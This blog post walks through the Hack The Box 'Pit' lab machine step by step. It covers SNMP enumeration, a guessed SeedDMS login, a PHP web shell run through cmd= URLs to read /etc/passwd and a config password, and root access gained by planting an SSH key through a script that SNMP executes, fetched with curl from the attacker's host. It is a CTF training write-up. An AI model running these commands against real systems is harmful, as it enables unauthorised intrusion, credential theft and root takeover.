PIT HACK THE BOX WALKTHROUGH
WELCOME TO TAMILCODE
HERE IS TRICKS AND TECHNOLOGY
So in this website, we going to see the walkthrough or writeup for the pit hack the box machine and we going to take over the root flag and user flag from the machine, etc. so Let get started.
So first as usual we startup with a nmap scan
STEP 1: nmap -sC -sV 10.10.10.241
The result has been given below
Further analyzing this nmap report I have found the interesting ports and services which is 22 SSH, 9090, and I have found the domain and subdomain also
Subdomain: dms-pit.htb
So let us add this domain to the /etc/hosts file to access this page
So next we will load the domain in the browser which is http://dms-pit.htb but shows the 403 error
So Next we try the 9090 port and it was redirected to the centos cockpit login page
After seeing this page we don't have any credentials to login
After a long time, I have run another scan which UDP
STEP 2: namp -sC -sV -sU 10.10.10.241
The report has been given below
Further analyzing this UDP scan I have found an interesting service and port which is 161 SNMP
So let us check this SNMP in the default public community
So first download Perl script tool link is below
After download this tool enters to an snmp-master folder there is script snmpbw.pl
STEP 3: perl snmpbw.pl -help
Now you will get the basic syntax to access this tool
STEP 4: ./snmpbw.pl 10.10.10.241 public 2 4
After completing the success you will get a file which is 10.10.10.241.snmp file
Now let us cat that file
STEP 5: cat 10.10.10.241.snmp
Now you will get some interesting information about the machine
After analyzing this report I have found that interesting directory which /var/www/html/seeddms51x/seeddms
So let us check this in browser http://dms-pit.htb/seeddms51x/seeddms
Now you can able to see the login page ( shown in the below image)
So let us tried this username which has been listed in snmp enumeration ( shown in the below image)
Now you can able see the users
So let us tried the first user which is michelle and tried the password it throws the error
So let us tried username michelle as same for the password which means username: michelle password: Michelle
Now you get login successful
So next I have google-searched for any exploit in seeddms
I have found one interesting article link is below
After reading this article you will get one idea so let we try this
So first enter to this /DMS/docs/users/michelle ( shown in the below image )
So next click the add document ( shown in the below image)
So Next we can able to upload the shell
download the shell using the below link:
After downloaded shell upload into that website ( shown in the below image)
So next click the file which was upload by you ( shown in the below image)
After entering into that file you can able to see the document id ( shown in the below image)
So Now we going to access the shell
So first load this browser
http://dms-pit.htb/seeddms51x/data/1048576/document_id/1.php?cmd=id
Note that you want enter the doument_id in the place
Now you can able to see the id of that Linux machine
So next we going to access the /etc/passwd file
http://dms-pit.htb/seeddms51x/data/1048576/document_id/1.php?cmd=cat /etc/passwd
Now you can able password file so next, we going to access the settings.xml for any passwords
http://dms-pit.htb/seeddms51x/data/1048576/document_id/1.php?cmd=cat ../../../conf/setting.xml
Now you will get the blank page ( so view the source page to get some stuff )
So now you will get the username and password for the database
So let us check this password for the centos page which we got in the 9090 port
So the username: michelle password: ied^ieY6xoquu
Now you will get the login successful
After analyzing this website I have found the terminal ( shown in the below image )
But I was in black appearance so change this to white otherwise you cannot able to see the file
Boooooooooooooooooooooooooooooooooooooooooooooooooooooommmmmmm!!!!
We got the user flag which user.txt
STEP 6: cat user.txt
PRIVILEGE ESCALATION
So next we going to take over the root flag
As we have previously noted one file in snmp enumeration which is /usr/bin/monitor
So let check this file
STEP 7: cat /usr/bin/monitor
Now you see that we can able to upload the file in monitoring
Further analyzing this I have found that something has misconfigured in the /usr/bin/monitoring
So let us check this file
STEP 8: cd /usr/bin
STEP 9: ls -la
Now you can able to see the + sign which means we have the write access in that folder ( user of michelle ) but we cannot able to read this
So let us create the ssh key to login into the machine
So first create the ssh key in your local machine ( kali or parrot )
STEP 10: ssh-keygen
Now the key will be generated so next we going to transfer this key to the pit machine
So now open the id_rsa.pub file and edit the below thing ( shown in the below image )
echo "ssh-key public" > /root/.ssh/authorized_key
And rename the file as check.sh
So next we going to transfer the file
Before that start the python server in our local machine
STEP 11: python -m http.server 5050
STEP 12: curl http://10.10.15.xx:5050/check.sh -o check.sh
So now the file is successfully transferred to the pit machine
Next copy the check.sh to /usr/local/monitoring
STEP 13: cp check.sh /usr/local/monitoring
Now the check.sh file copy to /usr/local/monitoring folder if want check use the below command
STEP 14: cat /usr/local/monitoring/check.sh
So next we going to execute the check.sh using snmp
STEP 15: ./snmpbw.pl 10.10.10.241 public 2 4
After completing the success you will file will be executed in the pit machine
So next we going to login in ssh using the id_rsa file
STEP 16: ssh -i id_rsa root@10.10.10.241
Now you will get the root flag which is root.txt
STEP 17: cat root.txt
I hope you will understand this article if liked this article please donate to us
Post a Comment